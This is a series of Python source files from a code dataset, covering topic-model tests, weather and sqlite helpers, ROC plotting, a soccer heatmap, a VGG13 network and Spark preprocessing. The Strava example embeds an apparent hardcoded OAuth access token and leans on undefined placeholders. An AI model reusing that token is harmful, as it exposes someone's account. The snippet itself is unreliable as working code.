tdlda_errors )\n\t\tS_baseline = stats.describe( baseline_errors )\n\t\t# we should be doing better than random!!\n\t\tself.assertLess( S.mean, S_baseline.mean )\n\t\t\n\t\t# plot the stats\n\t\tfig, ax = plt.subplots()\n\t\tx_pos = np.arange( 2 )\n\t\tax.bar( x_pos, [ S.mean, S_baseline.mean ], yerr=[ np.sqrt( S.variance ), np.sqrt( S_baseline.variance ) ], align='center', alpha=0.5, ecolor='black', capsize=10)\n\t\tax.set_ylabel( '$L_1$ error' )\n\t\tax.set_xticks( x_pos )\n\t\tax.set_xticklabels( [ 'TDLDA', 'Uniform' ] )\n\t\tax.yaxis.grid( True )\n\n\t\t# Save the figure and show\n\t\tplt.tight_layout()\n\t\tplt.title( 'Topic Recovery Error' 
)\n\t\tplt.savefig( 'topic_recovery_error.png' )\n\n\n\tdef testTLDANYTDataset( self ):\n\t\t# create the vocabulary map\n\t\tvocab_file = 'nyt_vocab.dat.txt'\n\t\tcorpus_file = 'nyt_data.txt'\n\t\tV = []\n\t\tfreqs = []\n\t\t# read in the vocabulary \n\t\twith open( os.path.join( self.assetpath, vocab_file ) ) as f:\n\t\t\tV = f.readlines()\n\t\tV = [ w.strip().strip( '\\n' ).strip( '\\'' ) for w in V if w != '' ]\n\t\t# read in the articles: each article is a line of comma-separated\n\t\t# pairs of word index and frequency\n\t\twith open( os.path.join( self.assetpath, corpus_file ) ) as f:\n\t\t\tfreqs = f.readlines()\n\t\tfreqs = [ d.strip().strip( '\\n' ).strip( '\\'' ) for d in freqs if d != '' ]\n\t\tC = np.zeros( ( len( V ), len( freqs ) ) )\n\t\tnum_words, num_docs = C.shape\n\t\t# utility to split each index:count pair from the frequencies file\n\t\tpair = lambda x: tuple( [ int( p ) for p in x.split( ':' ) ] )\n\t\t# build the corpus as a num_words x num_docs matrix of word counts\n\t\tfor j in range( num_docs ):\n\t\t\tpairs = [ pair( x ) for x in freqs[j].split( ',' ) ]\n\t\t\tfor ( w, count ) in pairs:\n\t\t\t\tC[w-1, j] = count \n\t\tnum_test_docs = 20\n\t\t# split into training set and test set\n\t\ttrain_set = C[:, :-num_test_docs]\n\t\ttest_set = C[:, -num_test_docs:]\n\n\t\t# fit the model\n\t\tk = 10\n\t\talpha0 = 1.\n\t\tTLDA = TensorDecompositionLDA( k, alpha0 )\n\t\talphas, Phi = TLDA.fit( train_set )\n\t\t# show the top words for each topic\n\t\ttopics = TLDA.topic_words( 5 )\n\t\t# map indices back to words for readability\n\t\tfor k, v in topics.items():\n\t\t\tlogging.info ( f'{k}, {[ ( V[idx], p ) for ( idx, p ) in v ]}' )\n\n\t\t# get the topic distributions for the test docs\n\t\tdoc_topics = TLDA.doc_topics( test_set )\n\t\tidx = 0\n\t\tfor k, v in doc_topics.items():\n\t\t\tlogging.info ( f'The most probable topic for this document is {np.argmax( v )}' )\n\t\t\tdoc = test_set[:, idx]\n\t\t\t# show original test document words gathered from the frequency matrix\n\t\t\tlogging.info ( f'Tokens from original article: {[ V[j] for j in range( len( doc ) ) if doc[j] > 0 ]}\\n\\n' )\n\t\t\tidx += 1\n\n\t\tdoc_topics_as_matrix = np.array( [ dist for dist in doc_topics.values() ] )\n\t\tnp.testing.assert_array_almost_equal( np.ones( num_test_docs ), np.sum( doc_topics_as_matrix, axis=1 ) )\n\n\tdef testTLDA20ng( self ):\n\t\tnews = fetch_20newsgroups( subset='all' )\n\t\tvectorizer = CountVectorizer( max_df=0.5, min_df=20, stop_words='english' )\n\t\tC = vectorizer.fit_transform( news[ 'data' ] ).toarray().T\n\t\tV = vectorizer.get_feature_names()\n\t\tk = 20\n\t\talpha0 = 1.\n\t\tTLDA = TensorDecompositionLDA( k, alpha0 )\n\t\talphas, Phi = TLDA.fit( C )\n\t\tfig, axs = plt.subplots( 7, 3, figsize=( 14, 24 ) )\n\n\t\tfor n in range( k ):\n\t\t\ti, j = divmod( n, 3 )\n\t\t\tax = axs[i, j]\n\t\t\tt = TLDA.topic_words( 100, n )\n\t\t\tfreqs = { V[idx]:p*1000 for ( idx, p ) in t[ f'topic {n}' ] }\n\n\t\t\twith warnings.catch_warnings():\n\t\t\t\t# hide deprecation warnings\n\t\t\t\twarnings.simplefilter( 'ignore' )\n\t\t\t\twc = WordCloud( background_color=\"white\", width=800, height=500 )\n\t\t\t\twc = wc.generate_from_frequencies( freqs )\n\t\t\t\tax.set_title( 'Topic %d' % (n + 1) )\n\t\t\t\tax.imshow( wc, interpolation='bilinear' )\n\t\t\t\tax.axis( 'off' )\n\n\t\taxs[-1, -1].axis( 'off' )\n\t\tplt.show()\n\t\t\nif __name__ == 
'__main__':\n\tunittest.main()\n","repo_name":"cs0lar/tdlda","sub_path":"tests/test_lda.py","file_name":"test_lda.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45132983373","text":"import forecaster as w\nimport os\nmyWeather = w.Weather(os.environ['DARK_SKY_KEY'])\n\ndef actuate(info):\n gpsData = info['LOCATION.GPS']\n coordinates = gpsData['current_location']['latlong']\n response = \"\"\n weather = myWeather.current(coordinates)\n if info[\"WeatherKeyword\"] == \"weather\":\n distance = weather[\"nearestStormDistance\"]\n if(distance < 5):\n response += \"Storm nearby. Batten the hatches.\"\n response += \"It is \" + str(weather[\"summary\"]) + \" outside and is \" + str(weather[\"temperature\"]) + \" with a humidity of \" + str(weather[\"humidity\"]) + \" and a wind speed of \" + str(weather[\"windSpeed\"])\n elif info[\"WeatherKeyword\"] == \"humidity\":\n response += \"The humidity is \" + str(weather[\"humidity\"])\n return response\n","repo_name":"huberf/PAL","sub_path":"weather/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18816398639","text":"from .day23 import part1, part2\n\nINPUT = \"\"\"set b 79\nset c b\njnz a 2\njnz 1 5\nmul b 100\nsub b -100000\nset c b\nsub c -17000\nset f 1\nset d 2\nset e 2\nset g d\nmul g e\nsub g b\njnz g 2\nset f 0\nsub e -1\nset g e\nsub g b\njnz g -8\nsub d -1\nset g d\nsub g b\njnz g -13\njnz f 2\nsub h -1\nset g b\nsub g c\njnz g 2\njnz 1 3\nsub b -17\njnz 1 -23\"\"\".split('\\n')\n\n\ndef test_part1():\n actual = part1(INPUT)\n assert actual == 5929\n\n\ndef test_part2():\n assert part2() == 907\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main()\n","repo_name":"snorrwe/advent-of-code","sub_path":"2017/advent_src/day23/day23_test.py","file_name":"day23_test.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42844648906","text":"# ============================*\n # ** Copyright UCAR (c) 2020\n # ** University Corporation for Atmospheric Research (UCAR)\n # ** National Center for Atmospheric Research (NCAR)\n # ** Research Applications Lab (RAL)\n # ** P.O.Box 3000, Boulder, Colorado, 80307-3000, USA\n # ============================*\n \n \n \n\"\"\"\nClass Name: ROCDiagramSeries\n \"\"\"\n__author__ = 'Minna Win'\n\nimport warnings\nimport pandas as pd\nimport re\nimport metcalcpy.util.ctc_statistics as cstats\nimport metcalcpy.util.pstd_statistics as pstats\nimport metcalcpy.util.utils as utils\nfrom ..series import Series\n\n\nclass ROCDiagramSeries(Series):\n \"\"\"\n Represents a ROC diagram series object\n of data points and their plotting style\n elements (line colors, markers, linestyles, etc.)\n\n \"\"\"\n\n def __init__(self, config, idx, input_data):\n super().__init__(config, idx, input_data)\n\n def _create_series_points(self):\n \"\"\"\n Subset the data for the appropriate series. Data input can\n originate from CTC linetype or PCT linetype. 
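# A tiny end-to-end check of the matching-based error used in the test file
# above: with the topic columns permuted, the optimal assignment recovers the
# permutation and the mean L1 distance is zero. It uses the same scipy tools
# as topicRecoveryError; the matrices are small random stand-ins.
import numpy as np
from scipy.spatial import distance_matrix
from scipy.optimize import linear_sum_assignment

rng = np.random.default_rng(0)
Phi = rng.dirichlet(np.ones(6), size=3).T   # 6 words x 3 topics, columns sum to 1
Beta = Phi[:, [2, 0, 1]]                    # the same topics, permuted

cost = distance_matrix(Beta.T, Phi.T, p=1)  # pairwise L1 between topic columns
rows, cols = linear_sum_assignment(cost)
print(cost[rows, cols].mean())              # ~0.0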
The methodology\n will depend on the linetype.\n\n Args:\n\n Returns:\n tuple of three lists:\n pody (Probability of detection) and\n pofd (probability of false detection/\n false alarm rate)\n thresh (threshold value, used to annotate)\n\n\n \"\"\"\n warnings.filterwarnings(\"error\")\n\n # Subset data based on self.all_series_vals that we acquired from the\n # config file\n input_df = self.input_data\n\n # Event equalization can sometimes create an empty data frame. Check for\n # an empty data frame and return a tuple of empty lists if this is the case.\n if input_df.empty:\n print(f\"INFO: No points to plot (most likely as a result of event equalization). \")\n return [],[],[]\n\n series_num = self.series_order\n perm = utils.create_permutations(self.all_series_vals)\n if len(self.all_series_vals) > 0:\n cur_perm = perm[series_num]\n subset_df = self._subset_data(input_df, cur_perm)\n else:\n # no subsetting of data required, no series_val_1 values\n # were specified in the config file.\n subset_df = input_df.copy()\n if self.config.linetype_ctc:\n subset_df = self._add_ctc_columns(subset_df)\n df_roc = cstats.calculate_ctc_roc(subset_df, ascending=self.config.ctc_ascending)\n pody = df_roc['pody']\n pody = pd.concat([pd.Series([1]), pody], ignore_index=True)\n pody = pd.concat([pody, pd.Series([0])], ignore_index=True)\n pofd = df_roc['pofd']\n pofd = pd.concat([pd.Series([1]), pofd], ignore_index=True)\n pofd = pd.concat([pofd, pd.Series([0])], ignore_index=True)\n thresh = df_roc['thresh']\n thresh = pd.concat([pd.Series(['']), thresh], ignore_index=True)\n thresh = pd.concat([thresh, pd.Series([''])], ignore_index=True)\n return pofd, pody, thresh\n\n elif self.config.linetype_pct:\n roc_df = pstats._calc_pct_roc(subset_df)\n pody = roc_df['pody']\n pody = pd.concat([pd.Series([1]), pody], ignore_index=True)\n pody = pd.concat([pody, pd.Series([0])])\n pofd = roc_df['pofd']\n pofd = pd.concat([pd.Series([1]), pofd], ignore_index=True)\n pofd = pd.concat([pofd, pd.Series([0])], ignore_index=True)\n thresh = roc_df['thresh']\n thresh = pd.concat([pd.Series(['']),thresh], ignore_index=True)\n thresh = pd.concat([thresh, pd.Series([''])], ignore_index=True)\n return pofd, pody, thresh\n else:\n raise ValueError('error neither ctc or pct linetype ')\n\n def _subset_data(self, df_full, permutation):\n '''\n Subset the input dataframe, iterating over the column and rows of interest\n\n Args:\n @param df_full: The pandas dataframe representation of the full\n input data.\n\n @param permutation: A list representing a permutation/series of\n interest (e.g. ['model', 'vx_mask'],\n which represent the series values of interest\n that are specified in the config file.\n\n Returns:\n df_subset: The portion of the full dataset that corresponds to the column header(s)\n and rows of interest.\n '''\n\n df_subset = df_full.copy()\n\n # only supporting series_val_1 for ROC diagrams, so we are\n # only interested in the series_inner_dict1\n inner_dict = self.config.series_inner_dict1\n\n for perm in permutation:\n for k, v in self.config.series_inner_dict1.items():\n if perm == k:\n column_header = v\n row_of_interest = perm\n\n df_subset = df_subset[df_subset[column_header] == row_of_interest]\n\n return df_subset\n\n def _add_ctc_columns(self, df_input):\n '''\n Create two new columns in the data frame from the fcst_thresh\n column of the CTC linetype data. 
This will be useful in sorting\n based on the fcst_thresh values.\n\n Args:\n @param df_input: the dataframe containing all the CTC data\n\n Returns:\n @param thresh_sorted: a new dataframe that is sorted based on\n the threshold value and threshold operator\n that comprise the fcst_thresh column.\n If two or more threshold values are identical,\n use the threshold operator (<,<=,==, >=,>)\n to determine the order.\n '''\n\n # If the df_input dataframe is empty (most likely as a result of event equalization),\n # return the df_input data frame.\n if df_input.empty:\n return df_input\n\n # From the fcst_thresh column, create two new columns, thresh_values and\n # op_wts that we can then sort using Pandas' multi-column sorting\n # capability.\n operators = []\n values = []\n thresholds = df_input['fcst_thresh']\n # Assign weights to the operators, 1 for the <, 5 for the > so that\n # > supercedes all other operators.\n wt_maps = {'<': 1, '<=': 2, '==': 3, '>=': 4, '>': 5}\n wts = []\n for thrsh in thresholds:\n # treat the fcst_thresh as two groups, one for\n # the operator and the other for the value (which\n # can be a negative value).\n match = re.match(r'(\\<|\\<=|\\==|\\>=|\\>)*((-)*([0-9])(.)*)', thrsh)\n match_text = re.match(r'(\\<|\\<=|\\==|\\>=|\\>)*(.*)', thrsh)\n if match:\n operators.append(match.group(1))\n value = float(match.group(2))\n values.append(value)\n elif match_text:\n operators.append(match_text.group(1))\n value = match_text.group(2)\n values.append(value)\n else:\n raise ValueError(\"fcst_thresh has a value that doesn't conform to \"\n \"the expected format\")\n\n for operator in operators:\n # if no operator precedes the number in fcst_thresh,\n # then assume this is the same as == and assign a weight of 3\n if operator is None:\n wts.append(3)\n else:\n wts.append(wt_maps[operator])\n\n # Add these columns to the input dataframe\n df_input['thresh_values'] = values\n df_input['op_wts'] = wts\n\n # return the input dataframe with two additional columns if\n # everything worked as expected\n return df_input\n","repo_name":"dtcenter/METplotpy","sub_path":"metplotpy/plots/roc_diagram/roc_diagram_series.py","file_name":"roc_diagram_series.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"5993254785","text":"\"\"\"DB functions module\"\"\"\n\nimport sqlite3\nimport streamlit as st\nfrom sqlite3 import Error\n\n\ndef create_connection():\n conn = None\n try:\n # create a memory database for testing\n conn = sqlite3.connect('twitter_likes.db')\n st.success(\n f'successful connection with sqlite version {sqlite3.version}')\n except Error as e:\n st.error(e, icon=\"🚨\")\n if conn:\n return conn\n else:\n return None\n\n\ndef create_users_table():\n conn = sqlite3.connect('twitter_likes.db')\n c = conn.cursor()\n\n c.execute('''\n CREATE TABLE IF NOT EXISTS users (\n id TEXT PRIMARY KEY,\n name TEXT,\n username TEXT\n )\n ''')\n\n conn.commit()\n conn.close()\n\n\ndef insert_users(conn, users):\n cur = conn.cursor()\n for user in users:\n cur.execute(\"INSERT OR IGNORE INTO users(id, name, username) VALUES(?, ?, ?)\",\n (user['id'], user['name'], user['username']))\n conn.commit()\n\n\ndef get_random_user():\n conn = sqlite3.connect('twitter_likes.db')\n c = conn.cursor()\n\n c.execute('SELECT * FROM users ORDER BY RANDOM() LIMIT 1')\n user = c.fetchone()\n\n conn.close()\n\n if user is None:\n return None\n else:\n return {'id': user[0], 'name': user[1], 'username': 
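# The fcst_thresh parsing idea from _add_ctc_columns above, reduced to a small
# sort key; the regex here is a simplified stand-in (longest operators tried
# first) rather than the original pattern, and the thresholds are made up.
import re

wt_maps = {'<': 1, '<=': 2, '==': 3, '>=': 4, '>': 5}

def sort_key(thresh):
    match = re.match(r'(<=|>=|==|<|>)?(-?\d+(?:\.\d+)?)$', thresh)
    op, value = match.group(1), float(match.group(2))
    # sort on the numeric value first; the operator weight breaks ties
    return value, wt_maps[op] if op else 3

print(sorted(['>=0.5', '<0.5', '==2', '>-1'], key=sort_key))
# ['>-1', '<0.5', '>=0.5', '==2']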
user[2]}\n","repo_name":"tonykipkemboi/lex-tweet-likes-randomizer","sub_path":"utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22806220163","text":"import json\nimport matplotlib.pyplot as plt\nfrom mplsoccer import Pitch\nimport numpy as np\nfrom scipy.ndimage import gaussian_filter\n\ndef get_heatmap(file, output, team, numeromaillot):\n data=[]\n numeromaillot=int(numeromaillot)\n with open('Data/' + file + '_SecondSpectrum_tracking-produced.jsonl','r') as f:\n for line in f:\n data.append(json.loads(line))\n with open('Data/'+ file + '_SecondSpectrum_meta.json','r') as t:\n datamatch=json.load(t)\n longueurTerrain=datamatch['pitchLength']\n largeurTerrain=datamatch['pitchWidth']\n nbFrames=len(data)\n playerpositionx=[]\n playerpositiony=[]\n label=''\n for j in range(0,nbFrames): \n if team==\"1\":\n for i in range(0,len(datamatch['homePlayers'])):\n if datamatch['homePlayers'][i]['number']==numeromaillot:\n label=datamatch['homePlayers'][i]['name']\n for i in range (0,len(data[j]['homePlayers'])):\n if data[j]['homePlayers'][i]['number']==numeromaillot:\n if data[j][\"period\"]==1:\n playerpositionx.append(data[j]['homePlayers'][i]['xyz'][0])\n playerpositiony.append(data[j]['homePlayers'][i]['xyz'][1])\n else: \n playerpositionx.append(-data[j]['homePlayers'][i]['xyz'][0])\n playerpositiony.append(-data[j]['homePlayers'][i]['xyz'][1])\n elif team==\"2\":\n for i in range(0,len(datamatch['awayPlayers'])):\n if datamatch['awayPlayers'][i]['number']==numeromaillot:\n label=datamatch['awayPlayers'][i]['name']\n for i in range (0,len(data[j]['awayPlayers'])):\n if data[j]['awayPlayers'][i]['number']==numeromaillot:\n if data[j][\"period\"]==1:\n playerpositionx.append(data[j]['awayPlayers'][i]['xyz'][0])\n playerpositiony.append(data[j]['awayPlayers'][i]['xyz'][1])\n else: \n playerpositionx.append(-data[j]['awayPlayers'][i]['xyz'][0])\n playerpositiony.append(-data[j]['awayPlayers'][i]['xyz'][1])\n\n pitch = Pitch(pitch_type='secondspectrum', line_zorder=2,\n pitch_length=longueurTerrain, pitch_width=largeurTerrain,\n pitch_color='#22312b', line_color='#efefef')\n # draw\n fig, ax = pitch.draw(figsize=(6.6, 4.125))\n fig.set_facecolor('white')\n bin_statistic = pitch.bin_statistic(np.array(playerpositionx),np.array(playerpositiony), statistic='count', bins=(25, 25))\n bin_statistic['statistic'] = gaussian_filter(bin_statistic['statistic'], 1)\n pcm = pitch.heatmap(bin_statistic, ax=ax, cmap='hot', edgecolors='#22312b')\n # Add the colorbar and format off-white\n cbar = fig.colorbar(pcm, ax=ax, shrink=0.6)\n cbar.outline.set_edgecolor('#efefef')\n cbar.ax.yaxis.set_tick_params(color='#efefef')\n ticks = plt.setp(plt.getp(cbar.ax.axes, 'yticklabels'), color='black')\n fig.suptitle(\"Heatmap of \"+label, x=0.5,fontsize=20)\n\n plt.savefig(output)\n plt.close()\n\n return output\n\n","repo_name":"tollim311/bayernDeMonique","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15553611562","text":"\nimport datetime\n\n# Configure OAuth2 access token for authorization: strava_oauth\nswagger_client.configuration.access_token = '4fedf5b7f13c26db633f44d16ed972e05eca3c9b'\n\n# create an instance of the API class\napi_instance = swagger_client.ActivitiesApi()\nname = name_example # String | The name of the 
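# The smoothing step behind the pitch heatmap above, reduced to plain
# numpy/scipy: bin positions into a 25x25 grid, then blur with a Gaussian
# (sigma=1, as in the script). The coordinates are random stand-ins for
# tracking data on an assumed 105 m x 68 m pitch.
import numpy as np
from scipy.ndimage import gaussian_filter

rng = np.random.default_rng(1)
x = rng.uniform(-52.5, 52.5, 1000)
y = rng.uniform(-34.0, 34.0, 1000)

counts, _, _ = np.histogram2d(x, y, bins=(25, 25))
smoothed = gaussian_filter(counts, sigma=1)
print(smoothed.shape, round(float(smoothed.max()), 2))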
activity.\ntype = type_example # String | Type of activity. For example - Run, Ride etc.\nstartDateLocal =cur\nelapsedTime = 56 # Integer | In seconds.\ndescription = description_example # String | Description of the activity. (optional)\ndistance = 3.4 # Float | In meters. (optional)\ntrainer = 56 # Integer | Set to 1 to mark as a trainer activity. (optional)\ncommute = 56 # Integer | Set to 1 to mark as commute. (optional)\n\ntry: \n # Create an Activity\n api_response = api_instance.createActivity(name, type, startDateLocal, elapsedTime, description=description, distance=distance, trainer=trainer, commute=commute)\n pprint(api_response)\nexcept ApiException as e:\n print(\"Exception when calling ActivitiesApi->createActivity: %s\\n\" % e)\n","repo_name":"on1659/coin_autoTradingBot","sub_path":"coin/example/stravaExample.py","file_name":"stravaExample.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74802177529","text":"import torch\nimport torch.utils.model_zoo as model_zoo\nimport torch.nn as nn\nfrom cnn_basic import ContConv2d\nimport math\n\n# pad all image to size 224\nclass MYVGG13(nn.Module):\n\n legend = [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']\n\n model_urls = {\n 'vgg11': 'https://download.pytorch.org/models/vgg11-bbd30ac9.pth',\n 'vgg13': 'https://download.pytorch.org/models/vgg13-c768596a.pth',\n 'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',\n 'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',\n 'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',\n 'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',\n 'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',\n 'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',\n }\n\n dataset_identifier = {\n 'MNIST': 0,\n 'CIFAR10': 1\n }\n\n # pre-trained option allows us to use parameters from the imagenet\n def __init__(self, dataset, pretrained = False, num_classes = 1000, batch_norm = True):\n super(MYVGG13, self).__init__()\n self.pretrained = pretrained\n self.num_classes = num_classes\n self.batch_norm = batch_norm\n\n self.features = self.make_layers()\n self.classifiers = self.make_classifier(dataset)\n\n if pretrained:\n if batch_norm:\n self.load_state_dict(model_zoo.load_url(self.model_urls['vgg13_bn']))\n else:\n self.load_state_dict(model_zoo.load_url(self.model_urls['vgg13']))\n\n def make_layers(self):\n layers = []\n in_channels = 3\n for v in self.legend:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n conv2d = ContConv2d(in_channels, v, kernel_size=3, padding=1)\n if self.batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\n def make_classifier(self, dataset):\n if dataset == 'CIFAR10':\n return nn.Sequential(\n nn.Linear(512 * 1 * 1, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, self.num_classes),\n )\n else:\n return nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, self.num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifiers(x)\n return x\n\n def _initialize_weights(self):\n for m 
in self.modules():\n if isinstance(m, ContConv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def load_state_dict(self, state_dict):\n\n own_state = self.state_dict()\n for name, param in state_dict.items():\n # only copy the filters in convolutional layers\n if name.lower().startswith('classifier'):\n continue\n if name not in own_state:\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n if isinstance(param, nn.Parameter):\n # backwards compatibility for serialized parameters\n param = param.data\n try:\n own_state[name].copy_(param)\n except:\n print('While copying the parameter named {}, whose dimensions in the model are'\n ' {} and whose dimensions in the checkpoint are {}, ...'.format(\n name, own_state[name].size(), param.size()))\n raise\n # for stationary model structure, there shouldn't be missing states\n # for controlled modules, we should expect classifiers to be missing\n # missing = set(own_state.keys()) - set(state_dict.keys())\n # if len(missing) > 0:\n # raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))\n\n # DON'T DO IT HERE!!!!!!!!!!!!!!!!!!!\n # for module in self.modules():\n # if isinstance(module, ContConv2d):\n # module.add_controller()\n\n\n def add_controller(self):\n cont_params = []\n for module in self.modules():\n if isinstance(module, nn.Conv2d):\n for name, param in module.named_parameters():\n if name == 'weight':\n param.require_grad = False\n cont_param = nn.Parameter(torch.randn(param.size()[0], param.size()[0]))\n comb_param = cont_param.mm(param.view(param.size()[0], -1)).view(*param.size())\n module._parameters['weight'] = comb_param\n cont_params.append(cont_param)\n return cont_params\n\n def load(self, path):\n checkpoint = torch.load(path)\n self.load_state_dict(checkpoint['state_dict'])\n\n def save(self, best_path):\n torch.save({'state_dict': best_path}, './model_params/param.pth.tar')\n\n","repo_name":"HarveyYan/ReproDANs","sub_path":"VGG13.py","file_name":"VGG13.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2151442563","text":"import math\nimport hashlib\nfrom pyspark import *\nfrom operator import add\nimport os\n\nfrom extensions import Extensions\nfrom logger import Logger\n\nMAX_UNIQUE_CATEGORICAL_FEATURES = long(10 ** 4)\n\nclass MixedData():\n\t\n\tdef __init__(self, sc, dataPath, headerFilePath):\n\t\t\n\t\tself.sc = sc\n\t\tself.uniqueCategoricals = MAX_UNIQUE_CATEGORICAL_FEATURES\n\t\t\n\t\t#initilize information about features\n\t\tself.featureNames = open(headerFilePath, \"r\").read().split(\"\\t\")\n\t\tself.integerColumns = [col for col in range(len(self.featureNames)) if self.featureNames[col][0] == 'I']\n\t\tself.categoricalColumns = [col for col in range(len(self.featureNames)) if self.featureNames[col][0] == 'C']\n\t\tself.labelColumns = [col for col in range(len(self.featureNames)) if self.featureNames[col][0] == \"L\"]\n\t\tself.allColumns = range(len(self.featureNames))\n\t\t\n\t\tif os.path.isdir(dataPath):\n\t\t\t#data is folder of object files, assume preprocessed\n\t\t\tLogger.info('Loading from pickle file at \\'' + dataPath + '\\'...')\n\t\t\tself.rdd = 
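# The reparameterization that add_controller() above applies, shown in
# isolation: freeze a pretrained filter bank W and learn a square mixing
# matrix C over its output channels, so the effective conv weight is C @ W
# flattened and reshaped back. The shapes below are small illustrative
# assumptions.
import torch

out_ch, in_ch, k = 8, 3, 3
W = torch.randn(out_ch, in_ch, k, k)      # stand-in for pretrained filters
W.requires_grad_(False)                   # keep the base filters frozen
C = torch.nn.Parameter(torch.randn(out_ch, out_ch))

effective = C.mm(W.view(out_ch, -1)).view_as(W)
x = torch.randn(1, in_ch, 16, 16)
y = torch.nn.functional.conv2d(x, effective, padding=1)
print(y.shape)  # torch.Size([1, 8, 16, 16]); gradients flow only into C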
sc.pickleFile(dataPath)\n\t\t\tself.preprocessed = True\n\t\t\tLogger.info('Complete.')\n\t\telse:\n\t\t\t#data is raw text file, needs to be parsed\n\t\t\tLogger.info('Parsing text file at \\'' + dataPath + '\\'...')\n\t\t\tself.rdd = sc.textFile(dataPath).map(lambda line: line.split(\"\\t\"))\n\t\t\t\n\t\t\t#convert the empty entries to None\n\t\t\tself.mapOnColumns(lambda value: None if value == '' else value, self.allColumns)\n\t\t\n\t\t\t#count the number of None entries in each column (used for integer preprocessing)\n\t\t\tself.noneCount = self.accumulateOnColumns(lambda value: 1 if value == None else 0, self.allColumns)\n\n\t\t\t#cast the integer features to integers\n\t\t\tself.mapOnColumns(lambda value: int(value) if value != None else None, self.integerColumns)\n\t\t\tLogger.info('Complete.')\n\t\t\t\n\t\t\tself.preprocessed = False\n\t\t\t\n\tdef mapOnColumns(self, function, columns):\n\t\t\n\t\tdef f(row):\n\t\t\tfor col in columns:\n\t\t\t\trow[col] = function(row[col])\n\t\t\treturn row\n\t\t\n\t\tself.rdd = self.rdd.map(f)\n\t\n\tdef mapOnColumnsWithParam(self, function, array, columns):\n\t\t\n\t\tdef f(row):\n\t\t\tfor col in columns:\n\t\t\t\trow[col] = function(row[col], array[col])\n\t\t\treturn row\n\t\t\n\t\tself.rdd = self.rdd.map(f)\n\t\t\n\tdef accumulateOnColumns(self, function, columns):\n\t\t\n\t\tlength = len(self.featureNames)\n\t\taccumulator = self.sc.accumulator([0] * length, Extensions.ListAccumulatorParam())\n\n\t\tdef f(row):\n\t\t\tincrement = [0] * length\n\t\t\tfor col in columns:\n\t\t\t\tincrement[col] = function(row[col])\n\t\t\taccumulator.add(increment)\n\t\t\t\n\t\tself.rdd.foreach(f)\n\t\t\n\t\treturn accumulator.value\n\t\t\n\tdef normaliseInts(self):\n\n\t\t#calculate sum of each int feature\n\t\tsum = self.accumulateOnColumns(lambda value: value, self.integerColumns)\n\t\t\n\t\t#calculate mean of each int feature\n\t\tcount = self.rdd.count()\n\t\tmeans = [sum[col] / float(count - self.noneCount[col]) for col in self.allColumns]\n\n\t\t#subtract mean from each integer feature\n\t\tself.mapOnColumnsWithParam(lambda value, mean: value - mean if value != None else None, means, self.integerColumns)\n\t\t\n\t\t#calculate sum of squared difference from the mean (missing values contribute 0 to the accumulator)\n\t\tsquareSum = self.accumulateOnColumns(lambda value: value ** 2 if value != None else 0, self.integerColumns)\n\t\t\n\t\t#calculate standard deviation of each int feature\n\t\tstdDevs = [math.sqrt(squareSum[col] / float(count - self.noneCount[col])) for col in self.allColumns]\n\t\t\n\t\t#divide each integer feature by SD\n\t\tself.mapOnColumnsWithParam(lambda value, sd: float(value) / sd if value != None and sd != 0 else value, stdDevs, self.integerColumns)\n\n\tdef hashCategoricalsToInts(self):\n\t\t\t\n\t\tleastCommonCategoricals\t= [[0]] * len(self.allColumns)\n\n\t\tfor col in self.categoricalColumns:\n\t\t\tcolumnHist = self.rdd.map(lambda row: (row[col], 1))\\\n\t\t\t\t.reduceByKey(add)\\\n\t\t\t\t.sortBy(lambda pair: 